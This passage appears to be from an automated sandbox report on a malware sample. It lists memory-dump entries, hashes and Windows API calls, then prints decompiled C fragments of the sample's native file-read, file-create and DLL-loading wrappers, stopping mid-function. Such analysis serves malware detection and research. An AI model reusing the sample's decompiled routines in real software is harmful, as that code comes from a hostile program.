                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %R$Oe#
                                                    • API String ID: 0-1074270569
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tht
                                                    • API String ID: 0-4180597119
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID: tht
                                                    • API String ID: 0-4180597119
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C470
                                                    • GetCurrentThread.KERNEL32 ref: 0159C4AD
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C4EA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0159C543
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C470
                                                    • GetCurrentThread.KERNEL32 ref: 0159C4AD
                                                    • GetCurrentProcess.KERNEL32 ref: 0159C4EA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0159C543
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 05671746
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: f1b5f4d18ad5ed64919a0fec03920364185bf5e40accc1b69a2aa50319e0d31a
                                                    • Instruction ID: 0e9911c962921edae6bf3cd26c1fc3faaf3dd9927e55af7b50c1d59e7e012ca1
                                                    • Opcode Fuzzy Hash: f1b5f4d18ad5ed64919a0fec03920364185bf5e40accc1b69a2aa50319e0d31a
                                                    • Instruction Fuzzy Hash: 697113B0A00B098FDB64DF2AD14576ABBF1BF89214F008A2ED44AD7B50DB75E845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056736CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 67d9b0dbb145411f6a801a6c36300fec4a15dc3fb5498f0c889989fd4df14020
                                                    • Instruction ID: 9bc9b4df5dc6d9ef87b1f76256052eb6932fd6bc13698bd2bc35b755a7d1c3dd
                                                    • Opcode Fuzzy Hash: 67d9b0dbb145411f6a801a6c36300fec4a15dc3fb5498f0c889989fd4df14020
                                                    • Instruction Fuzzy Hash: 2951C0B1D103099FDB14CFA9C880ADEBBB5BF48314F64862AE815AB350D7759985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056736CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: bd49e06d202015d917a59bccc96bbf3663d2b53513b684958183609a97202a3a
                                                    • Instruction ID: 6388a895877ca3ec95b2756d133bbb38f3c06a709f458f6a12fab21690d98c1a
                                                    • Opcode Fuzzy Hash: bd49e06d202015d917a59bccc96bbf3663d2b53513b684958183609a97202a3a
                                                    • Instruction Fuzzy Hash: 9341CFB1D103099FDF14CFAAC884ADEBBB5BF88314F24852AE419AB310D7759985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 05679131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8128d3528c6e673a07ea595f719e38f936436dd3bfc0aa48edd32b296f839355
                                                    • Instruction ID: 7a620e7f7ece9b86267af7572b005611a6b3cddab5d4cbf2bd5b0ef2b82ae387
                                                    • Opcode Fuzzy Hash: 8128d3528c6e673a07ea595f719e38f936436dd3bfc0aa48edd32b296f839355
                                                    • Instruction Fuzzy Hash: 2641C271C04618CBDB24DFA5C888BDEBBF5BF49304F10806AD409AB651DBB5694ACF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05676041
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 17a90f8e12e0ad23ed067a7a921411b5470d0c34c3a09ffb98560fd0b4e960bc
                                                    • Instruction ID: 74ebc9277de07ab44bbea799be0478f82be4eb1420d5391246779e36dc45487c
                                                    • Opcode Fuzzy Hash: 17a90f8e12e0ad23ed067a7a921411b5470d0c34c3a09ffb98560fd0b4e960bc
                                                    • Instruction Fuzzy Hash: 99415BB4A00609CFCB14CF99C488BAABFF5FF88314F148459E519AB321D775A941CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 05679131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8bfe5325250851f0a13579ae398672c88ad8251f8c221d48baff22aa654bdef6
                                                    • Instruction ID: bbf7397c5d6d3a051312e35949cb6867a20cce3b3ba1b70d58fa70f5cc7b11f4
                                                    • Opcode Fuzzy Hash: 8bfe5325250851f0a13579ae398672c88ad8251f8c221d48baff22aa654bdef6
                                                    • Instruction Fuzzy Hash: 2141C271C0461CCBDB24DFA9C888BDEBBF5BF49304F108169D409AB651DBB56946CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159CAC7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: a2d813e1537a5e288c56546897d3bb0ee278dbb29be6118d22d50e4367a9c042
                                                    • Instruction ID: 8755c5450789d9432c1e4011e5e4ea0aef0e1302cfe14d2818f60afbdadd3a62
                                                    • Opcode Fuzzy Hash: a2d813e1537a5e288c56546897d3bb0ee278dbb29be6118d22d50e4367a9c042
                                                    • Instruction Fuzzy Hash: E821E5B5D00208AFDF10CF9AD885ADEBBF9FB48324F14841AE914A7710D378A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0159CAC7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: e68aca42792e144bbf97b2c800da0df3b1b3aca3a324f301763e27cfc96183f3
                                                    • Instruction ID: b96a7fbe2bff87bf38d8f32326750a7a6f336adf5381f3c56ded6fdf51a0bd57
                                                    • Opcode Fuzzy Hash: e68aca42792e144bbf97b2c800da0df3b1b3aca3a324f301763e27cfc96183f3
                                                    • Instruction Fuzzy Hash: D021C4B5D012489FDF10CFAAD884ADEBBF4FB48324F14841AE914A7310D378A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056717C1,00000800,00000000,00000000), ref: 056719D2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 2fedcae5ddfb8b6d6f4bd2c6e8b9b7e0274ed67a48e9aedd31cdf49677d7a2f7
                                                    • Instruction ID: 54154ff310f9049a89f0a984f9a39a40a9169d917eb37da5849130df227b494a
                                                    • Opcode Fuzzy Hash: 2fedcae5ddfb8b6d6f4bd2c6e8b9b7e0274ed67a48e9aedd31cdf49677d7a2f7
                                                    • Instruction Fuzzy Hash: 991100B29042489FCB10CF9AD844AEEFBF4FB89320F14842AE415A7700C774A946CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 05673C65
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 978087b9171a15921eb6255d8d4b91cd58ae6e6b8b7a87b6b01b5ec52551d7d4
                                                    • Instruction ID: 4eb8ac25a62287e67237abbd0c6e735d999260f539d817314c815dc136b4cff5
                                                    • Opcode Fuzzy Hash: 978087b9171a15921eb6255d8d4b91cd58ae6e6b8b7a87b6b01b5ec52551d7d4
                                                    • Instruction Fuzzy Hash: 341103B5904248DFDB10CF99D985BEEBBF8FB48724F20881AE915A7700D374A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 05671746
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 98baf2362601b7612c26e7da817c415a590fc39258116573c5849b8355403cae
                                                    • Instruction ID: 573a82d1380e5e737083e3ec5559e67c5f0e39237abd6224d5a9d0d9202ab32f
                                                    • Opcode Fuzzy Hash: 98baf2362601b7612c26e7da817c415a590fc39258116573c5849b8355403cae
                                                    • Instruction Fuzzy Hash: 2211E0B6C042498FDB10CF9AD844BDEFBF8AF89224F14846AD819B7700D379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af1db9b45ffd328441899bdd8a7a12618798e06db61c36266b8395361ddeffca
                                                    • Instruction ID: 3f55b8b8633ea955b167edb435d184845b2998340ca67aa2e621ed311c2f4c99
                                                    • Opcode Fuzzy Hash: af1db9b45ffd328441899bdd8a7a12618798e06db61c36266b8395361ddeffca
                                                    • Instruction Fuzzy Hash: 472103B1504244EFDB06DF94D8C0B26BB65FBC8B28F24857DF9050A64AC336D846C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8023e0a8ce112850dbc0ba60262a6224c77563de1017e6c89b5325d61c35e274
                                                    • Instruction ID: 49963cbc0d79c1206ae11934a059c2d01bf60ebc589557d80589abe9fad33da9
                                                    • Opcode Fuzzy Hash: 8023e0a8ce112850dbc0ba60262a6224c77563de1017e6c89b5325d61c35e274
                                                    • Instruction Fuzzy Hash: E421F4B1504244DFDB05CF94D9C0B26BB65FB98B2CF24857DE9054B646C336D846C7E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 90bd52cd4d7f70b033b0a837a5cd4dc77c0354030883eb24399ecd2d100cedd7
                                                    • Instruction ID: 84df335aee7a931de694caaf9e773c70f99fe7f3ebf544846ea66ae0efd0a513
                                                    • Opcode Fuzzy Hash: 90bd52cd4d7f70b033b0a837a5cd4dc77c0354030883eb24399ecd2d100cedd7
                                                    • Instruction Fuzzy Hash: CE2137B2608244DFCB15CF64E8C0B26BB65FBC8358F24C56DD80A4B786C336D807CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50913300fbaaf52661cab2882bf6caad5c9514c29ebc35a59780585da222fa7a
                                                    • Instruction ID: 88eeaf14c40bf03b3420e03b5f6913dbf67b71431648fb3d26a1db50ece0c3f7
                                                    • Opcode Fuzzy Hash: 50913300fbaaf52661cab2882bf6caad5c9514c29ebc35a59780585da222fa7a
                                                    • Instruction Fuzzy Hash: EB212972504244EFDB05CF94E9C0B26BB65FB88328F24C56DD8094B786C736D846CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6d3a9e3807c739e76d9e3f404bd9dee1ebeb30afa2701e58b26aeb33af9edcbc
                                                    • Instruction ID: 66778ba7edfcfb7a3643d5e8037f47c5fdc400c002f2848af7f0922ce3cfaffe
                                                    • Opcode Fuzzy Hash: 6d3a9e3807c739e76d9e3f404bd9dee1ebeb30afa2701e58b26aeb33af9edcbc
                                                    • Instruction Fuzzy Hash: 652184765093808FDB13CF24D994715BF71EB85214F28C5DAD8498B697C33AD44ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction ID: fa5ae5b3582a5eb86054c3faefa68ff78519f64733df03cc6748261081590cdf
                                                    • Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction Fuzzy Hash: 1911B176404280CFCB12CF54D9C4B56BF71FB84724F2486ADE8054B61BC33AD856CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction ID: 09f8782182c606cb57a600835d08f55de8fdbd77b3959db6f763f72fd646d538
                                                    • Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
                                                    • Instruction Fuzzy Hash: 4611B176504280DFCB12CF54D9C4B16BF71FB94728F2486ADE8094B656C33AD856CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680293173.00000000013DD000.00000040.00000001.sdmp, Offset: 013DD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
                                                    • Instruction ID: c84cdee32fd6d1063557ce61b107b38aff1d831533a0a39f0a23f803209e44ea
                                                    • Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
                                                    • Instruction Fuzzy Hash: A6118B76904280DFDB12CF54D5C4B15BBB1FB84228F28C6AAD8494B696C33AD44ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7285f514f5c93180eaf1ce30805459ca27be08fe718af6bf39e62c6745513f89
                                                    • Instruction ID: cea231cc2c2f7f9f4540955a40cacb3654a31e3eef889de5dae33c9fe5f788df
                                                    • Opcode Fuzzy Hash: 7285f514f5c93180eaf1ce30805459ca27be08fe718af6bf39e62c6745513f89
                                                    • Instruction Fuzzy Hash: CD01F271408394AEEB109E56DC80B66BBDCEF45A68F08846EFD081A646C7799C44C7F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680251227.00000000013CD000.00000040.00000001.sdmp, Offset: 013CD000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 035ecdbcdbf75553c6273fc132f28d9b2cd8ebd392dafb738746a826d8d6b0e0
                                                    • Instruction ID: 65220a42fe89f8dae60c2004c95c7290c02b394396bc95e753d5a683f4b0497b
                                                    • Opcode Fuzzy Hash: 035ecdbcdbf75553c6273fc132f28d9b2cd8ebd392dafb738746a826d8d6b0e0
                                                    • Instruction Fuzzy Hash: 76F068714042949FEB118E16CC84B62FFD8EF41A74F18C45AFD145B646C3799C44CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.684281804.0000000005670000.00000040.00000001.sdmp, Offset: 05670000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8c8c5f77401818e8b4b2a364145d7b4e87fcbdf652422570817fb9dd074a7a0
                                                    • Instruction ID: ee9182260077fbb020086a52347d066452bd88aadd3283369ba05cc926961777
                                                    • Opcode Fuzzy Hash: d8c8c5f77401818e8b4b2a364145d7b4e87fcbdf652422570817fb9dd074a7a0
                                                    • Instruction Fuzzy Hash: FBA17D36E0060A8FCF15CFA5C8485EDBBB2FF84310B15856AE815BB320EB31A945CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7fd6135909b0be1d9285a390b9ad2075190359f246fa31a0c9818a063247dba
                                                    • Instruction ID: 4c8a4f57ee7e3c5f0cab0dcd6cad638c6ee0a2998a3d5087bf2360954f2aefd8
                                                    • Opcode Fuzzy Hash: a7fd6135909b0be1d9285a390b9ad2075190359f246fa31a0c9818a063247dba
                                                    • Instruction Fuzzy Hash: 7481DE74E15219CFCB44CFA9C58499EFBF1FF88210B24956AE455EB324E334AA42CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.680551747.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                    Executed Functions

                                                    C-Code - Quality: 37%
                                                    			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                    				void* _t18;
                                                    				void* _t27;
                                                    				intOrPtr* _t28;
                                                    
                                                    				_t13 = _a4;
                                                    				_t28 = _a4 + 0xc48;
                                                    				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                    				_t6 =  &_a32; // 0x414d42
                                                    				_t12 =  &_a8; // 0x414d42
                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                    				return _t18;
                                                    			}

                                                    APIs
                                                    • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: BMA$BMA
                                                    • API String ID: 2738559852-2163208940
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                    				intOrPtr* _v8;
                                                    				struct _EXCEPTION_RECORD _v12;
                                                    				struct _OBJDIR_INFORMATION _v16;
                                                    				char _v536;
                                                    				void* _t15;
                                                    				struct _OBJDIR_INFORMATION _t17;
                                                    				struct _OBJDIR_INFORMATION _t18;
                                                    				void* _t30;
                                                    				void* _t31;
                                                    				void* _t32;
                                                    
                                                    				_v8 =  &_v536;
                                                    				_t15 = E0041C650( &_v12, 0x104, _a8);
                                                    				_t31 = _t30 + 0xc;
                                                    				if(_t15 != 0) {
                                                    					_t17 = E0041CA70(_v8, __eflags, _v8);
                                                    					_t32 = _t31 + 4;
                                                    					__eflags = _t17;
                                                    					if(_t17 != 0) {
                                                    						E0041CCF0( &_v12, 0);
                                                    						_t32 = _t32 + 8;
                                                    					}
                                                    					_t18 = E0041AEA0(_v8);
                                                    					_v16 = _t18;
                                                    					__eflags = _t18;
                                                    					if(_t18 == 0) {
                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                    						return _v16;
                                                    					}
                                                    					return _t18;
                                                    				} else {
                                                    					return _t15;
                                                    				}
                                                    			}

                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00419D5E(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				void* _v117;
                                                    				long _t22;
                                                    				void* _t34;
                                                    
                                                    				asm("popad");
                                                    				_t16 = _a4;
                                                    				_t4 = _t16 + 0xc40; // 0xc40
                                                    				E0041A960(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t22;
                                                    			}

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                    				long _t21;
                                                    				void* _t31;
                                                    
                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                    				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                    				return _t21;
                                                    			}

                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00419F3A(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    				void* _t22;
                                                    
                                                    				_push(ds);
                                                    				asm("fidivr word [ecx-0x74aa11b9]");
                                                    				_t10 = _a4;
                                                    				_t3 = _t10 + 0xc60; // 0xca0
